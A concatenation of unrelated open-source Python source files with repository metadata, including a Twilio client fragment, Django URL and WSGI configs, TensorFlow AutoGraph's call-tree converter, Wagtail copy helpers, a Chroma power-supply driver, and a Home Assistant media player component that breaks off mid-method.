:returns: twilio.rest.conversations.v1.service.conversation.participant.ParticipantList
:rtype: twilio.rest.conversations.v1.service.conversation.participant.ParticipantList
"""
return self._proxy.participants
@property
def messages(self):
"""
Access the messages
:returns: twilio.rest.conversations.v1.service.conversation.message.MessageList
:rtype: twilio.rest.conversations.v1.service.conversation.message.MessageList
"""
return self._proxy.messages
@property
def webhooks(self):
"""
Access the webhooks
:returns: twilio.rest.conversations.v1.service.conversation.webhook.WebhookList
:rtype: twilio.rest.conversations.v1.service.conversation.webhook.WebhookList
"""
return self._proxy.webhooks
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Conversations.V1.ConversationInstance {}>'.format(context)
| {
"content_hash": "d27869aad1a09de95ca77e6d16fcefa3",
"timestamp": "",
"source": "github",
"line_count": 661,
"max_line_length": 129,
"avg_line_length": 38.94553706505295,
"alnum_prop": 0.6416501573243212,
"repo_name": "twilio/twilio-python",
"id": "07c34b4a0f30a0a72cae6f68a95b049f6a98b31f",
"size": "25758",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "twilio/rest/conversations/v1/service/conversation/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "234"
},
{
"name": "Makefile",
"bytes": "2157"
},
{
"name": "Python",
"bytes": "11241545"
}
],
"symlink_target": ""
} |
from django.conf.urls.defaults import *
urlpatterns = patterns('shopping',
# Example:
# (r'^server/', include('server.foo.urls')),
# Uncomment the admin/doc line below and add 'django.contrib.admindocs'
# to INSTALLED_APPS to enable admin documentation:
# (r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
# (r'^admin/(.*)', admin.site.root),
(r'pc_cube$', 'shopping.pc_cube'),
)
| {
"content_hash": "bf2612c78cc1af15bd535570efd3ce03",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 76,
"avg_line_length": 31.6,
"alnum_prop": 0.6518987341772152,
"repo_name": "eob/synckit-research",
"id": "b0fd69333983d35ff044a3e936885cd5845660c2",
"size": "474",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server/shopping/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "65239505"
},
{
"name": "PHP",
"bytes": "15712"
},
{
"name": "Python",
"bytes": "125913"
},
{
"name": "R",
"bytes": "21637"
},
{
"name": "Shell",
"bytes": "2697"
}
],
"symlink_target": ""
} |
"""Handles function calls, by generating compiled function names and calls.
Note: this transformer does not rename the top level object being converted;
that is the caller's responsibility.
Requires function_scopes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.python.autograph.core import converter
from tensorflow.python.autograph.pyct import anno
from tensorflow.python.autograph.pyct import ast_util
from tensorflow.python.autograph.pyct import parser
from tensorflow.python.autograph.pyct import templates
from tensorflow.python.autograph.utils import ag_logging
# TODO(mdan): Rename to FunctionCallsTransformer.
class _Function(object):
no_root = True
def __init__(self):
self.context_name = None
set_trace_warned = False
class CallTreeTransformer(converter.Base):
"""Transforms the call tree by renaming transformed symbols."""
def visit_Lambda(self, node):
if anno.hasanno(node, 'function_context_name'):
# Lambda functions created during the conversion process have no
# context manager.
self.state[_Function].enter()
self.state[_Function].context_name = anno.getanno(
node, 'function_context_name')
node = self.generic_visit(node)
self.state[_Function].exit()
else:
node = self.generic_visit(node)
return node
def visit_FunctionDef(self, node):
self.state[_Function].enter()
# Note: if the conversion process ever creates helper functions, this
# assumption will no longer hold.
assert anno.hasanno(node, 'function_context_name'), (
'The function_scopes converter always creates a scope for functions.')
self.state[_Function].context_name = anno.getanno(
node, 'function_context_name')
node.args = self.visit(node.args)
node.body = self.visit_block(node.body)
if self.state[_Function].level < 2:
# Top-level functions lose their decorator because the conversion is
# always just-in-time and by the time it happens the decorators are
# already set to be applied.
node.decorator_list = []
else:
# Inner functions are converted already, so we insert a decorator to
# prevent double conversion. Double conversion would work too, but this
# saves the overhead.
node.decorator_list.append(
parser.parse_expression('ag__.do_not_convert_internal'))
if node.returns:
node.returns = self.visit(node.returns)
self.state[_Function].exit()
return node
def visit_With(self, node):
# Context manager calls (in node.items) are not converted.
node.body = self.visit_block(node.body)
return node
def visit_Call(self, node):
full_name = str(anno.getanno(node.func, anno.Basic.QN, default=''))
function_context_name = self.state[_Function].context_name
node = self.generic_visit(node)
# TODO(mdan): Refactor converted_call as a 'Call' operator.
# Calls to the internal 'ag__' module are never converted (though their
# arguments might be).
if full_name.startswith('ag__.'):
return node
# Calls to the function context manager (inserted by function_scopes) are
# also safe.
if full_name.startswith(function_context_name + '.'):
return node
# Calls to pdb.set_trace or ipdb.set_trace are never converted. We don't use
# the normal mechanisms to bypass these literals because they are sensitive
# to the frame they are being called from.
# TODO(mdan): Generalize this to a "static whitelist" config.
if full_name in ('pdb.set_trace', 'ipdb.set_trace', 'breakpoint'):
global set_trace_warned
if not set_trace_warned:
# TODO(mdan): Update and shorten once available on tensorflow.org.
ag_logging.warn(
'Detected `pdb.set_trace()` in converted code. The code'
' generated by AutoGraph is not optimized for step-by-step'
' debugging. See https://github.com/tensorflow/tensorflow/'
'blob/master/tensorflow/python/autograph/g3doc/reference/'
'debugging.md.')
set_trace_warned = True
return node
if (full_name == 'print' and
not self.ctx.program.options.uses(converter.Feature.BUILTIN_FUNCTIONS)):
return node
func = node.func
starred_arg = None
normal_args = []
for a in node.args:
if isinstance(a, gast.Starred):
assert starred_arg is None, 'Multiple *args should be impossible.'
starred_arg = a
else:
normal_args.append(a)
if starred_arg is None:
args = templates.replace_as_expression('(args,)', args=normal_args)
else:
args = templates.replace_as_expression(
'(args,) + tuple(stararg)',
stararg=starred_arg.value,
args=normal_args)
kwargs_arg = None
normal_keywords = []
for k in node.keywords:
if k.arg is None:
assert kwargs_arg is None, 'Multiple **kwargs should be impossible.'
kwargs_arg = k
else:
normal_keywords.append(k)
if kwargs_arg is None:
if not normal_keywords:
kwargs = parser.parse_expression('None')
else:
kwargs = ast_util.keywords_to_dict(normal_keywords)
else:
kwargs = templates.replace_as_expression(
'dict(kwargs, **keywords)',
kwargs=kwargs_arg.value,
keywords=ast_util.keywords_to_dict(normal_keywords))
template = """
ag__.converted_call(func, options, args, kwargs, function_ctx)
"""
new_call = templates.replace_as_expression(
template,
func=func,
options=parser.parse_expression(function_context_name + '.callopts'),
args=args,
kwargs=kwargs,
function_ctx=function_context_name)
return new_call
def transform(node, ctx):
"""Transform function call to the compiled counterparts.
Args:
node: AST
ctx: EntityContext
Returns:
A tuple (node, new_names):
node: The transformed AST
new_names: set(string), containing any newly-generated names
"""
return CallTreeTransformer(ctx).visit(node)
| {
"content_hash": "1a5c595997b3924a66427073ee0cef01",
"timestamp": "",
"source": "github",
"line_count": 187,
"max_line_length": 80,
"avg_line_length": 33.01069518716577,
"alnum_prop": 0.6705005669852584,
"repo_name": "DavidNorman/tensorflow",
"id": "5a5a2c95ddec1680457c5b5b262b8e70502c15dd",
"size": "6862",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tensorflow/python/autograph/converters/call_trees.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "4913"
},
{
"name": "Batchfile",
"bytes": "15272"
},
{
"name": "C",
"bytes": "774469"
},
{
"name": "C#",
"bytes": "8562"
},
{
"name": "C++",
"bytes": "74659044"
},
{
"name": "CMake",
"bytes": "6545"
},
{
"name": "Dockerfile",
"bytes": "79827"
},
{
"name": "Go",
"bytes": "1670422"
},
{
"name": "HTML",
"bytes": "4680032"
},
{
"name": "Java",
"bytes": "827737"
},
{
"name": "Jupyter Notebook",
"bytes": "540800"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "1004638"
},
{
"name": "Makefile",
"bytes": "66660"
},
{
"name": "Objective-C",
"bytes": "105247"
},
{
"name": "Objective-C++",
"bytes": "297569"
},
{
"name": "PHP",
"bytes": "23553"
},
{
"name": "Pascal",
"bytes": "3752"
},
{
"name": "Pawn",
"bytes": "14529"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "37406546"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Ruby",
"bytes": "4706"
},
{
"name": "Shell",
"bytes": "452517"
},
{
"name": "Smarty",
"bytes": "31460"
},
{
"name": "Swift",
"bytes": "62814"
}
],
"symlink_target": ""
} |
"""
WSGI config for project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project.settings")
#application = get_wsgi_application()
application = get_wsgi_application()
application = DjangoWhiteNoise(application) | {
"content_hash": "95d4490aa2e5b1c63797538f4142f90a",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 78,
"avg_line_length": 26,
"alnum_prop": 0.7884615384615384,
"repo_name": "nicogid/Projet4Moc1",
"id": "48e5c4fb36be11eb6b2d2640774c5b96c519be43",
"size": "520",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "api/project/project/wsgi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Arduino",
"bytes": "30059"
},
{
"name": "C",
"bytes": "6541"
},
{
"name": "HTML",
"bytes": "312"
},
{
"name": "Java",
"bytes": "26689"
},
{
"name": "Python",
"bytes": "45567"
}
],
"symlink_target": ""
} |
from django.contrib.contenttypes.fields import GenericRelation
from django.db import models
from modelcluster.fields import ParentalKey, ParentalManyToManyField
from modelcluster.models import ClusterableModel
def _extract_field_data(source, exclude_fields=None):
"""
Get dictionaries representing the model's field data.
This excludes many to many fields (which are handled by _copy_m2m_relations)'
"""
exclude_fields = exclude_fields or []
data_dict = {}
for field in source._meta.get_fields():
# Ignore explicitly excluded fields
if field.name in exclude_fields:
continue
# Ignore reverse relations
if field.auto_created:
continue
# Ignore reverse generic relations
if isinstance(field, GenericRelation):
continue
# Copy parental m2m relations
if field.many_to_many:
if isinstance(field, ParentalManyToManyField):
parental_field = getattr(source, field.name)
if hasattr(parental_field, "all"):
values = parental_field.all()
if values:
data_dict[field.name] = values
continue
# Ignore parent links (page_ptr)
if isinstance(field, models.OneToOneField) and field.remote_field.parent_link:
continue
if isinstance(field, models.ForeignKey):
# Use attname to copy the ID instead of retrieving the instance
# Note: We first need to set the field to None to unset any object
# that's there already just setting _id on its own won't change the
# field until its saved.
data_dict[field.name] = None
data_dict[field.attname] = getattr(source, field.attname)
else:
data_dict[field.name] = getattr(source, field.name)
return data_dict
def _copy_m2m_relations(source, target, exclude_fields=None, update_attrs=None):
"""
Copies non-ParentalManyToMany m2m relations
"""
update_attrs = update_attrs or {}
exclude_fields = exclude_fields or []
for field in source._meta.get_fields():
# Copy m2m relations. Ignore explicitly excluded fields, reverse relations, and Parental m2m fields.
if (
field.many_to_many
and field.name not in exclude_fields
and not field.auto_created
and not isinstance(field, ParentalManyToManyField)
):
try:
# Do not copy m2m links with a through model that has a ParentalKey to the model being copied - these will be copied as child objects
through_model_parental_links = [
field
for field in field.through._meta.get_fields()
if isinstance(field, ParentalKey)
and issubclass(source.__class__, field.related_model)
]
if through_model_parental_links:
continue
except AttributeError:
pass
if field.name in update_attrs:
value = update_attrs[field.name]
else:
value = getattr(source, field.name).all()
getattr(target, field.name).set(value)
def _copy(source, exclude_fields=None, update_attrs=None):
data_dict = _extract_field_data(source, exclude_fields=exclude_fields)
target = source.__class__(**data_dict)
if update_attrs:
for field, value in update_attrs.items():
if field not in data_dict:
continue
setattr(target, field, value)
if isinstance(source, ClusterableModel):
child_object_map = source.copy_all_child_relations(
target, exclude=exclude_fields
)
else:
child_object_map = {}
return target, child_object_map
| {
"content_hash": "07a706a1c8a3d0b8a97bc4f5c3423fc3",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 149,
"avg_line_length": 34.5929203539823,
"alnum_prop": 0.6045024302890765,
"repo_name": "thenewguy/wagtail",
"id": "178c260ba8ec6db5f84d73404cb78648f20a335d",
"size": "3909",
"binary": false,
"copies": "4",
"ref": "refs/heads/tng_master",
"path": "wagtail/models/copying.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "2522"
},
{
"name": "Dockerfile",
"bytes": "2041"
},
{
"name": "HTML",
"bytes": "593033"
},
{
"name": "JavaScript",
"bytes": "615631"
},
{
"name": "Makefile",
"bytes": "1413"
},
{
"name": "Python",
"bytes": "6571572"
},
{
"name": "SCSS",
"bytes": "219986"
},
{
"name": "Shell",
"bytes": "6845"
},
{
"name": "TypeScript",
"bytes": "288325"
}
],
"symlink_target": ""
} |
"""
Python Interchangeable Virtual Instrument Library
Copyright (c) 2013-2014 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from .chroma62000p import *
class chroma62012p40120(chroma62000p):
"Chroma ATE 62012P-40-120 series IVI DC power supply driver"
def __init__(self, *args, **kwargs):
self.__dict__.setdefault('_instrument_id', '62012P-40-120')
super(chroma62012p40120, self).__init__(*args, **kwargs)
self._output_count = 1
self._output_spec = [
{
'range': {
'P40V': (40.0, 120.0)
},
'ovp_max': 44.0,
'ocp_max': 132.0,
'voltage_max': 40.0,
'current_max': 120.0
}
]
self._init_outputs()
| {
"content_hash": "b1907642195eb9cc067eeab19930f7ed",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 77,
"avg_line_length": 34.074074074074076,
"alnum_prop": 0.6603260869565217,
"repo_name": "margguo/python-ivi",
"id": "18991709fd7ed085cacdb030b46322870121519c",
"size": "1840",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "ivi/chroma/chroma62012p40120.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1738999"
}
],
"symlink_target": ""
} |
"""Component to interface with various media players."""
import asyncio
import base64
import collections
from datetime import timedelta
import functools as ft
import hashlib
import logging
from random import SystemRandom
from typing import Optional
from urllib.parse import urlparse
from aiohttp import web
from aiohttp.hdrs import CACHE_CONTROL, CONTENT_TYPE
import async_timeout
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.components.http import KEY_AUTHENTICATED, HomeAssistantView
from homeassistant.const import (
SERVICE_MEDIA_NEXT_TRACK,
SERVICE_MEDIA_PAUSE,
SERVICE_MEDIA_PLAY,
SERVICE_MEDIA_PLAY_PAUSE,
SERVICE_MEDIA_PREVIOUS_TRACK,
SERVICE_MEDIA_SEEK,
SERVICE_MEDIA_STOP,
SERVICE_SHUFFLE_SET,
SERVICE_TOGGLE,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
SERVICE_VOLUME_DOWN,
SERVICE_VOLUME_MUTE,
SERVICE_VOLUME_SET,
SERVICE_VOLUME_UP,
STATE_IDLE,
STATE_OFF,
STATE_PLAYING,
)
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.config_validation import ( # noqa: F401
PLATFORM_SCHEMA,
PLATFORM_SCHEMA_BASE,
)
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.loader import bind_hass
from .const import (
ATTR_APP_ID,
ATTR_APP_NAME,
ATTR_INPUT_SOURCE,
ATTR_INPUT_SOURCE_LIST,
ATTR_MEDIA_ALBUM_ARTIST,
ATTR_MEDIA_ALBUM_NAME,
ATTR_MEDIA_ARTIST,
ATTR_MEDIA_CHANNEL,
ATTR_MEDIA_CONTENT_ID,
ATTR_MEDIA_CONTENT_TYPE,
ATTR_MEDIA_DURATION,
ATTR_MEDIA_ENQUEUE,
ATTR_MEDIA_EPISODE,
ATTR_MEDIA_PLAYLIST,
ATTR_MEDIA_POSITION,
ATTR_MEDIA_POSITION_UPDATED_AT,
ATTR_MEDIA_SEASON,
ATTR_MEDIA_SEEK_POSITION,
ATTR_MEDIA_SERIES_TITLE,
ATTR_MEDIA_SHUFFLE,
ATTR_MEDIA_TITLE,
ATTR_MEDIA_TRACK,
ATTR_MEDIA_VOLUME_LEVEL,
ATTR_MEDIA_VOLUME_MUTED,
ATTR_SOUND_MODE,
ATTR_SOUND_MODE_LIST,
DOMAIN,
SERVICE_CLEAR_PLAYLIST,
SERVICE_PLAY_MEDIA,
SERVICE_SELECT_SOUND_MODE,
SERVICE_SELECT_SOURCE,
SUPPORT_CLEAR_PLAYLIST,
SUPPORT_NEXT_TRACK,
SUPPORT_PAUSE,
SUPPORT_PLAY,
SUPPORT_PLAY_MEDIA,
SUPPORT_PREVIOUS_TRACK,
SUPPORT_SEEK,
SUPPORT_SELECT_SOUND_MODE,
SUPPORT_SELECT_SOURCE,
SUPPORT_SHUFFLE_SET,
SUPPORT_STOP,
SUPPORT_TURN_OFF,
SUPPORT_TURN_ON,
SUPPORT_VOLUME_MUTE,
SUPPORT_VOLUME_SET,
SUPPORT_VOLUME_STEP,
)
# mypy: allow-untyped-defs, no-check-untyped-defs
_LOGGER = logging.getLogger(__name__)
_RND = SystemRandom()
ENTITY_ID_FORMAT = DOMAIN + ".{}"
ENTITY_IMAGE_URL = "/api/media_player_proxy/{0}?token={1}&cache={2}"
CACHE_IMAGES = "images"
CACHE_MAXSIZE = "maxsize"
CACHE_LOCK = "lock"
CACHE_URL = "url"
CACHE_CONTENT = "content"
ENTITY_IMAGE_CACHE = {CACHE_IMAGES: collections.OrderedDict(), CACHE_MAXSIZE: 16}
SCAN_INTERVAL = timedelta(seconds=10)
DEVICE_CLASS_TV = "tv"
DEVICE_CLASS_SPEAKER = "speaker"
DEVICE_CLASSES = [DEVICE_CLASS_TV, DEVICE_CLASS_SPEAKER]
DEVICE_CLASSES_SCHEMA = vol.All(vol.Lower, vol.In(DEVICE_CLASSES))
MEDIA_PLAYER_PLAY_MEDIA_SCHEMA = {
vol.Required(ATTR_MEDIA_CONTENT_TYPE): cv.string,
vol.Required(ATTR_MEDIA_CONTENT_ID): cv.string,
vol.Optional(ATTR_MEDIA_ENQUEUE): cv.boolean,
}
ATTR_TO_PROPERTY = [
ATTR_MEDIA_VOLUME_LEVEL,
ATTR_MEDIA_VOLUME_MUTED,
ATTR_MEDIA_CONTENT_ID,
ATTR_MEDIA_CONTENT_TYPE,
ATTR_MEDIA_DURATION,
ATTR_MEDIA_POSITION,
ATTR_MEDIA_POSITION_UPDATED_AT,
ATTR_MEDIA_TITLE,
ATTR_MEDIA_ARTIST,
ATTR_MEDIA_ALBUM_NAME,
ATTR_MEDIA_ALBUM_ARTIST,
ATTR_MEDIA_TRACK,
ATTR_MEDIA_SERIES_TITLE,
ATTR_MEDIA_SEASON,
ATTR_MEDIA_EPISODE,
ATTR_MEDIA_CHANNEL,
ATTR_MEDIA_PLAYLIST,
ATTR_APP_ID,
ATTR_APP_NAME,
ATTR_INPUT_SOURCE,
ATTR_SOUND_MODE,
ATTR_MEDIA_SHUFFLE,
]
@bind_hass
def is_on(hass, entity_id=None):
"""
Return true if specified media player entity_id is on.
Check all media player if no entity_id specified.
"""
entity_ids = [entity_id] if entity_id else hass.states.entity_ids(DOMAIN)
return any(
not hass.states.is_state(entity_id, STATE_OFF) for entity_id in entity_ids
)
WS_TYPE_MEDIA_PLAYER_THUMBNAIL = "media_player_thumbnail"
SCHEMA_WEBSOCKET_GET_THUMBNAIL = websocket_api.BASE_COMMAND_MESSAGE_SCHEMA.extend(
{"type": WS_TYPE_MEDIA_PLAYER_THUMBNAIL, "entity_id": cv.entity_id}
)
def _rename_keys(**keys):
"""Create validator that renames keys.
Necessary because the service schema names do not match the command parameters.
Async friendly.
"""
def rename(value):
for to_key, from_key in keys.items():
if from_key in value:
value[to_key] = value.pop(from_key)
return value
return rename
async def async_setup(hass, config):
"""Track states and offer events for media_players."""
component = hass.data[DOMAIN] = EntityComponent(
logging.getLogger(__name__), DOMAIN, hass, SCAN_INTERVAL
)
hass.components.websocket_api.async_register_command(
WS_TYPE_MEDIA_PLAYER_THUMBNAIL,
websocket_handle_thumbnail,
SCHEMA_WEBSOCKET_GET_THUMBNAIL,
)
hass.http.register_view(MediaPlayerImageView(component))
await component.async_setup(config)
component.async_register_entity_service(
SERVICE_TURN_ON, {}, "async_turn_on", [SUPPORT_TURN_ON]
)
component.async_register_entity_service(
SERVICE_TURN_OFF, {}, "async_turn_off", [SUPPORT_TURN_OFF]
)
component.async_register_entity_service(
SERVICE_TOGGLE, {}, "async_toggle", [SUPPORT_TURN_OFF | SUPPORT_TURN_ON],
)
component.async_register_entity_service(
SERVICE_VOLUME_UP,
{},
"async_volume_up",
[SUPPORT_VOLUME_SET, SUPPORT_VOLUME_STEP],
)
component.async_register_entity_service(
SERVICE_VOLUME_DOWN,
{},
"async_volume_down",
[SUPPORT_VOLUME_SET, SUPPORT_VOLUME_STEP],
)
component.async_register_entity_service(
SERVICE_MEDIA_PLAY_PAUSE,
{},
"async_media_play_pause",
[SUPPORT_PLAY | SUPPORT_PAUSE],
)
component.async_register_entity_service(
SERVICE_MEDIA_PLAY, {}, "async_media_play", [SUPPORT_PLAY]
)
component.async_register_entity_service(
SERVICE_MEDIA_PAUSE, {}, "async_media_pause", [SUPPORT_PAUSE]
)
component.async_register_entity_service(
SERVICE_MEDIA_STOP, {}, "async_media_stop", [SUPPORT_STOP]
)
component.async_register_entity_service(
SERVICE_MEDIA_NEXT_TRACK, {}, "async_media_next_track", [SUPPORT_NEXT_TRACK],
)
component.async_register_entity_service(
SERVICE_MEDIA_PREVIOUS_TRACK,
{},
"async_media_previous_track",
[SUPPORT_PREVIOUS_TRACK],
)
component.async_register_entity_service(
SERVICE_CLEAR_PLAYLIST, {}, "async_clear_playlist", [SUPPORT_CLEAR_PLAYLIST],
)
component.async_register_entity_service(
SERVICE_VOLUME_SET,
vol.All(
cv.make_entity_service_schema(
{vol.Required(ATTR_MEDIA_VOLUME_LEVEL): cv.small_float}
),
_rename_keys(volume=ATTR_MEDIA_VOLUME_LEVEL),
),
"async_set_volume_level",
[SUPPORT_VOLUME_SET],
)
component.async_register_entity_service(
SERVICE_VOLUME_MUTE,
vol.All(
cv.make_entity_service_schema(
{vol.Required(ATTR_MEDIA_VOLUME_MUTED): cv.boolean}
),
_rename_keys(mute=ATTR_MEDIA_VOLUME_MUTED),
),
"async_mute_volume",
[SUPPORT_VOLUME_MUTE],
)
component.async_register_entity_service(
SERVICE_MEDIA_SEEK,
vol.All(
cv.make_entity_service_schema(
{
vol.Required(ATTR_MEDIA_SEEK_POSITION): vol.All(
vol.Coerce(float), vol.Range(min=0)
)
}
),
_rename_keys(position=ATTR_MEDIA_SEEK_POSITION),
),
"async_media_seek",
[SUPPORT_SEEK],
)
component.async_register_entity_service(
SERVICE_SELECT_SOURCE,
{vol.Required(ATTR_INPUT_SOURCE): cv.string},
"async_select_source",
[SUPPORT_SELECT_SOURCE],
)
component.async_register_entity_service(
SERVICE_SELECT_SOUND_MODE,
{vol.Required(ATTR_SOUND_MODE): cv.string},
"async_select_sound_mode",
[SUPPORT_SELECT_SOUND_MODE],
)
component.async_register_entity_service(
SERVICE_PLAY_MEDIA,
vol.All(
cv.make_entity_service_schema(MEDIA_PLAYER_PLAY_MEDIA_SCHEMA),
_rename_keys(
media_type=ATTR_MEDIA_CONTENT_TYPE,
media_id=ATTR_MEDIA_CONTENT_ID,
enqueue=ATTR_MEDIA_ENQUEUE,
),
),
"async_play_media",
[SUPPORT_PLAY_MEDIA],
)
component.async_register_entity_service(
SERVICE_SHUFFLE_SET,
{vol.Required(ATTR_MEDIA_SHUFFLE): cv.boolean},
"async_set_shuffle",
[SUPPORT_SHUFFLE_SET],
)
return True
async def async_setup_entry(hass, entry):
"""Set up a config entry."""
return await hass.data[DOMAIN].async_setup_entry(entry)
async def async_unload_entry(hass, entry):
"""Unload a config entry."""
return await hass.data[DOMAIN].async_unload_entry(entry)
class MediaPlayerDevice(Entity):
"""ABC for media player devices."""
_access_token: Optional[str] = None
# Implement these for your media player
@property
def state(self):
"""State of the player."""
return None
@property
def access_token(self) -> str:
"""Access token for this media player."""
if self._access_token is None:
self._access_token = hashlib.sha256(
_RND.getrandbits(256).to_bytes(32, "little")
).hexdigest()
return self._access_token
@property
def volume_level(self):
"""Volume level of the media player (0..1)."""
return None
@property
def is_volume_muted(self):
"""Boolean if volume is currently muted."""
return None
@property
def media_content_id(self):
"""Content ID of current playing media."""
return None
@property
def media_content_type(self):
"""Content type of current playing media."""
return None
@property
def media_duration(self):
"""Duration of current playing media in seconds."""
return None
@property
def media_position(self):
"""Position of current playing media in seconds."""
return None
@property
def media_position_updated_at(self):
"""When was the position of the current playing media valid.
Returns value from homeassistant.util.dt.utcnow().
"""
return None
@property
def media_image_url(self):
"""Image url of current playing media."""
return None
@property
def media_image_remotely_accessible(self) -> bool:
"""If the image url is remotely accessible."""
return False
@property
def media_image_hash(self):
"""Hash value for media image."""
url = self.media_image_url
if url is not None:
return hashlib.sha256(url.encode("utf-8")).hexdigest()[:16]
return None
async def async_get_media_image(self):
"""Fetch media image of current playing image."""
url = self.media_image_url
if url is None:
return None, None
return await _async_fetch_image(self.hass, url)
@property
def media_title(self):
"""Title of current playing media."""
return None
@property
def media_artist(self):
"""Artist of current playing media, music track only."""
return None
@property
def media_album_name(self):
"""Album name of current playing media, music track only."""
return None
@property
def media_album_artist(self):
"""Album artist of current playing media, music track only."""
return None
@property
def media_track(self):
"""Track number of current playing media, music track only."""
return None
@property
def media_series_title(self):
"""Title of series of current playing media, TV show only."""
return None
@property
def media_season(self):
"""Season of current playing media, TV show only."""
return None
@property
def media_episode(self):
"""Episode of current playing media, TV show only."""
return None
@property
def media_channel(self):
"""Channel currently playing."""
return None
@property
def media_playlist(self):
"""Title of Playlist currently playing."""
return None
@property
def app_id(self):
"""ID of the current running app."""
return None
@property
def app_name(self):
"""Name of the current running app."""
return None
@property
def source(self):
"""Name of the current input source."""
return None
@property
def source_list(self):
"""List of available input sources."""
return None
@property
def sound_mode(self):
"""Name of the current sound mode."""
return None
@property
def sound_mode_list(self):
"""List of available sound modes."""
return None
@property
def shuffle(self):
"""Boolean if shuffle is enabled."""
return None
@property
def supported_features(self):
"""Flag media player features that are supported."""
return 0
def turn_on(self):
"""Turn the media player on."""
raise NotImplementedError()
async def async_turn_on(self):
"""Turn the media player on."""
await self.hass.async_add_job(self.turn_on)
def turn_off(self):
"""Turn the media player off."""
raise NotImplementedError()
async def async_turn_off(self):
"""Turn the media player off."""
await self.hass.async_add_job(self.turn_off)
def mute_volume(self, mute):
"""Mute the volume."""
raise NotImplementedError()
async def async_mute_volume(self, mute):
"""Mute the volume."""
await self.hass.async_add_job(self.mute_volume, mute)
def set_volume_level(self, volume):
"""Set volume level, range 0..1."""
raise NotImplementedError()
async def async_set_volume_level(self, volume):
"""Set volume level, range 0..1."""
await self.hass.async_add_job(self.set_volume_level, volume)
def media_play(self):
"""Send play command."""
raise NotImplementedError()
async def async_media_play(self):
"""Send play command."""
await self.hass.async_add_job(self.media_play)
def media_pause(self):
"""Send pause command."""
raise NotImplementedError()
async def async_media_pause(self):
"""Send pause command."""
await self.hass.async_add_job(self.media_pause)
def media_stop(self):
"""Send stop command."""
raise NotImplementedError()
async def async_media_stop(self):
"""Send stop command."""
await self.hass.async_add_job(self.media_stop)
def media_previous_track(self):
"""Send previous track command."""
raise NotImplementedError()
async def async_media_previous_track(self):
"""Send previous track command."""
await self.hass.async_add_job(self.media_previous_track)
def media_next_track(self):
"""Send next track command."""
raise NotImplementedError()
async def async_media_next_track(self):
"""Send next track command."""
await self.hass.async_add_job(self.media_next_track)
def media_seek(self, position):
"""Send seek command."""
raise NotImplementedError()
async def async_media_seek(self, position):
"""Send seek command."""
await self.hass.async_add_job(self.media_seek, position)
def play_media(self, media_type, media_id, **kwargs):
"""Play a piece of media."""
raise NotImplementedError()
async def async_play_media(self, media_type, media_id, **kwargs):
"""Play a piece of media."""
await self.hass.async_add_job(
ft.partial(self.play_media, media_type, media_id, **kwargs)
)
def select_source(self, source):
"""Select input source."""
raise NotImplementedError()
async def async_select_source(self, source):
"""Select input source."""
await self.hass.async_add_job(self.select_source, source)
def select_sound_mode(self, sound_mode):
"""Select sound mode."""
raise NotImplementedError()
async def async_select_sound_mode(self, sound_mode):
"""Select sound mode."""
await self.hass.async_add_job(self.select_sound_mode, sound_mode)
def clear_playlist(self):
"""Clear players playlist."""
raise NotImplementedError()
async def async_clear_playlist(self):
"""Clear players playlist."""
await self.hass.async_add_job(self.clear_playlist)
def set_shuffle(self, shuffle):
"""Enable/disable shuffle mode."""
raise NotImplementedError()
async def async_set_shuffle(self, shuffle):
"""Enable/disable shuffle mode."""
